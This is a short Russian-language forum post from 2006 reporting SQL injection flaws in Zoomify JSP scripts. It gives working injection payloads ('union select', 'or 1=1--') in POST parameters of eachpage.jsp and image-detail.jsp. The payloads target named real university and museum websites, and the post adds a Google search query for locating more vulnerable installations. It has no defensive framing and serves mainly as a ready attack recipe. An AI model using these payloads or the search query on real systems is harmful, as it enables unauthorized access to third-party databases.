Многочисленные уязвимости Zoomify

Discussion in 'Уязвимости' started by 1ten0.0net1, 16 Nov 2006.

  1. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    Zoomify представляет собой достаточно распространенный набор JavaScript - скриптов.
    Уязвимы несколько переменных (отсутсвие филтрации), например:
    $VolumeId, $pageId скрипта eachpage.jsp
    Пример:
    _http://tomcat.sunsite.ualberta.ca/Imanishi/eachpage.jsp
    POST: pageid=KAMA0008&VolumeId=KAMA'+union%20select%201,2--&catNumber=13


    $imagecode в скрипте image-detail.jsp
    Пример:
    _http://www.nhm.ac.uk/research-curation/projects/solanaceaesource/taxonomy/image-detail.jsp
    POST:imagecode=931+or+1=1--


    Google trick:
    powered Zoomify [filetype:jsp]
     
    2 people like this.